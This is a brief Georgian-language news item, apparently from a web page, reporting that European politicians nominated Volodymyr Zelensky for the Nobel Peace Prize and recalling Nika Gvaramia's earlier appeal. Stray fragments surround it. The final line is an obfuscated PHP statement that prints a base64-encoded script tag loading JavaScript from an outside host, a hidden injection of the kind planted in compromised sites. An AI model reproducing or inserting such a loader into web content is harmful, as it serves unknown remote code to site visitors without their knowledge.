celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი, მშვიდობის დარგში, ნობელის პრემიაზე წარადგინეს. ინფორმაციას უკრაინული მედია ავრცელებს და წერს, რომ ეს გადაწყვეტილება ევროპელმა მოქმედმა და ყოფილმა პოლიტიკოსებმა მიიღეს. 
 
"მთელი უკრაინელი ერი ავტორიტარიზმის წინააღმდეგ დადგა. ვფიქრობთ, რომ ზუსტად ახლაა ის დრო, როდესაც უკრაინელმა ერმა უნდა დაინახოს, რომ მთელი მსოფლიო მის გვერდითაა", - ნათქვამია განცხადებაში. 
 
ცნობისთვის, თავდაპირველად, 2 მარტს, "მთავარი არხის" გენერალურმა დირექტორმა ნიკა გვარამიამ საზოგადოებას მოუწოდა, ნორვეგიის ნობელის კომიტეტისთვის, ვოლოდიმირ ზელენსკისთვის მშვიდობის დარგში ნობელის პრემიის მინიჭების თაობაზე მიემართათ.
 
761
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");